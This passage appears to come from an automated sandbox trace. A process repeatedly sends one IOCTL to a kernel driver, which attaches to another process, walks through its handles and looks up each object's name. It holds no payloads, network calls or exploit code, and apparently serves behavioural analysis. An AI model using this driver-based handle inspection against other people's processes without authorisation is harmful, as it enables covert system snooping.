lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.133] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.133] PsAcquireProcessExitSynchronization () returned 0x0 [0244.133] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.133] ObReferenceObjectByHandle (in: Handle=0x640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018dad60, HandleInformation=0x0) returned 0x0 [0244.133] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.133] PsReleaseProcessExitSynchronization () returned 0x2 [0244.133] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.133] ObQueryNameString (in: Object=0xfffff8a0018dad60, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.133] ObfDereferenceObject (Object=0xfffff8a0018dad60) returned 0x1 [0244.133] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.133] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.133] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.133] PsAcquireProcessExitSynchronization () returned 0x0 [0244.133] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.134] ObReferenceObjectByHandle (in: Handle=0x650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018e41a0, HandleInformation=0x0) returned 0x0 [0244.134] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.134] PsReleaseProcessExitSynchronization () returned 0x2 [0244.134] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.134] ObQueryNameString (in: Object=0xfffff8a0018e41a0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.134] ObfDereferenceObject (Object=0xfffff8a0018e41a0) returned 0x1 [0244.134] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.134] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.134] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.134] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.134] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.134] PsAcquireProcessExitSynchronization () returned 0x0 [0244.134] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.134] ObReferenceObjectByHandle (in: Handle=0x660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018e17f0, HandleInformation=0x0) returned 0x0 [0244.134] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.134] PsReleaseProcessExitSynchronization () returned 0x2 [0244.134] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.134] ObQueryNameString (in: Object=0xfffff8a0018e17f0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.134] ObfDereferenceObject (Object=0xfffff8a0018e17f0) returned 0x1 [0244.134] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.134] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.134] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.134] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.134] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.134] PsAcquireProcessExitSynchronization () returned 0x0 [0244.134] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.134] ObReferenceObjectByHandle (in: Handle=0x670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018eac20, HandleInformation=0x0) returned 0x0 [0244.134] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.134] PsReleaseProcessExitSynchronization () returned 0x2 [0244.134] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.134] ObQueryNameString (in: Object=0xfffff8a0018eac20, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.135] ObfDereferenceObject (Object=0xfffff8a0018eac20) returned 0x1 [0244.135] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.135] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.135] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.135] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.135] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.135] PsAcquireProcessExitSynchronization () returned 0x0 [0244.135] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.135] ObReferenceObjectByHandle (in: Handle=0x680, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018e1690, HandleInformation=0x0) returned 0x0 [0244.135] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.135] PsReleaseProcessExitSynchronization () returned 0x2 [0244.135] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.135] ObQueryNameString (in: Object=0xfffff8a0018e1690, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.135] ObfDereferenceObject (Object=0xfffff8a0018e1690) returned 0x1 [0244.135] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.135] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.135] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.135] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.135] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.135] PsAcquireProcessExitSynchronization () returned 0x0 [0244.135] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.135] ObReferenceObjectByHandle (in: Handle=0x690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018f1e50, HandleInformation=0x0) returned 0x0 [0244.135] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.135] PsReleaseProcessExitSynchronization () returned 0x2 [0244.135] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.135] ObQueryNameString (in: Object=0xfffff8a0018f1e50, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.135] ObfDereferenceObject (Object=0xfffff8a0018f1e50) returned 0x1 [0244.135] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.135] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.135] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.136] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.136] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.136] PsAcquireProcessExitSynchronization () returned 0x0 [0244.136] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.136] ObReferenceObjectByHandle (in: Handle=0x6a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018da6d0, HandleInformation=0x0) returned 0x0 [0244.136] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.136] PsReleaseProcessExitSynchronization () returned 0x2 [0244.136] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.136] ObQueryNameString (in: Object=0xfffff8a0018da6d0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.136] ObfDereferenceObject (Object=0xfffff8a0018da6d0) returned 0x1 [0244.136] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.136] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.136] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.136] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.136] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.136] PsAcquireProcessExitSynchronization () returned 0x0 [0244.136] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.136] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018f4ee0, HandleInformation=0x0) returned 0x0 [0244.136] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.136] PsReleaseProcessExitSynchronization () returned 0x2 [0244.136] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.136] ObQueryNameString (in: Object=0xfffff8a0018f4ee0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.136] ObfDereferenceObject (Object=0xfffff8a0018f4ee0) returned 0x1 [0244.136] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.136] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.136] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.136] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.136] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.136] PsAcquireProcessExitSynchronization () returned 0x0 [0244.136] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.137] ObReferenceObjectByHandle (in: Handle=0x6c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018f8b10, HandleInformation=0x0) returned 0x0 [0244.137] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.137] PsReleaseProcessExitSynchronization () returned 0x2 [0244.137] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.137] ObQueryNameString (in: Object=0xfffff8a0018f8b10, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.137] ObfDereferenceObject (Object=0xfffff8a0018f8b10) returned 0x1 [0244.137] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.137] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.137] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.137] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.137] PsAcquireProcessExitSynchronization () returned 0x0 [0244.137] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.137] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018e7060, HandleInformation=0x0) returned 0x0 [0244.137] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.137] PsReleaseProcessExitSynchronization () returned 0x2 [0244.137] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.137] ObQueryNameString (in: Object=0xfffff8a0018e7060, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.137] ObfDereferenceObject (Object=0xfffff8a0018e7060) returned 0x1 [0244.137] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.137] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.137] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.137] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.137] PsAcquireProcessExitSynchronization () returned 0x0 [0244.137] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.137] ObReferenceObjectByHandle (in: Handle=0x6e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019008c0, HandleInformation=0x0) returned 0x0 [0244.137] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.137] PsReleaseProcessExitSynchronization () returned 0x2 [0244.137] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.137] ObQueryNameString (in: Object=0xfffff8a0019008c0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.138] ObfDereferenceObject (Object=0xfffff8a0019008c0) returned 0x1 [0244.138] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.240] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.240] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.240] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.240] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.240] PsAcquireProcessExitSynchronization () returned 0x0 [0244.240] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.240] ObReferenceObjectByHandle (in: Handle=0x6f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00190dc10, HandleInformation=0x0) returned 0x0 [0244.240] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.240] PsReleaseProcessExitSynchronization () returned 0x2 [0244.240] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.240] ObQueryNameString (in: Object=0xfffff8a00190dc10, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.240] ObfDereferenceObject (Object=0xfffff8a00190dc10) returned 0x1 [0244.240] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.241] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.241] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.241] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.241] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.241] PsAcquireProcessExitSynchronization () returned 0x0 [0244.241] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.241] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00190d3b0, HandleInformation=0x0) returned 0x0 [0244.241] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.241] PsReleaseProcessExitSynchronization () returned 0x2 [0244.241] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.241] ObQueryNameString (in: Object=0xfffff8a00190d3b0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.241] ObfDereferenceObject (Object=0xfffff8a00190d3b0) returned 0x1 [0244.241] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.241] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.241] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.241] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.241] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.241] PsAcquireProcessExitSynchronization () returned 0x0 [0244.241] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.241] ObReferenceObjectByHandle (in: Handle=0x710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001907c00, HandleInformation=0x0) returned 0x0 [0244.241] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.241] PsReleaseProcessExitSynchronization () returned 0x2 [0244.242] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.242] ObQueryNameString (in: Object=0xfffff8a001907c00, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.242] ObfDereferenceObject (Object=0xfffff8a001907c00) returned 0x1 [0244.242] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.242] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.242] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.242] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.242] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.242] PsAcquireProcessExitSynchronization () returned 0x0 [0244.242] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.242] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001902fc0, HandleInformation=0x0) returned 0x0 [0244.242] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.242] PsReleaseProcessExitSynchronization () returned 0x2 [0244.242] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.242] ObQueryNameString (in: Object=0xfffff8a001902fc0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.242] ObfDereferenceObject (Object=0xfffff8a001902fc0) returned 0x1 [0244.242] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.242] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.242] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.242] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.242] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: 